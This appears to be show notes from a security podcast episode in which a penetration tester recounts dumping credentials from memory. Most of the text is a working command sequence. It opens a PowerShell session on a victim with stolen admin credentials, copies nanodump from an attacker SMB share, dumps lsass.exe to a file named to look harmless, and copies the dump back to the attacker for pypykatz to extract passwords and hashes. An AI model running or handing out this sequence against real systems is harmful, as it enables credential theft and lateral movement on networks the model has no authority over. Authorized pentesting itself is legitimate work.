7MS #508: Tales of Pentest Pwnage - Part 33
Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.
We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:
# Windows system: tell your Windows system to trust the victim host you're about to PS into:
winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"}
# Windows system: PowerShell into the victim system
Enter-PSSession -computername VICTIM-SERVER -Credential domain.com\pwneduser
# Kali system: create and share a folder with nanodump.exe in it:
sudo mkdir /share
sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support
# Victim system: copy nanodump from Kali box to VICTIM-SERVER
copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\
# Victim system: get the PID for lsass.exe
tasklist /FI "IMAGENAME eq lsass.exe"
# Victim system: use nano to do the lsass dump
c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log
# Victim system: Get the log back to your Kali share
copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\
# Kali system: "fix" the dump and extract credz with mimikatz!
sudo /opt/nanodump/restore_signature.sh toteslegit.log
sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt
Enjoy delicious passwords and hashes in the dump.txt file!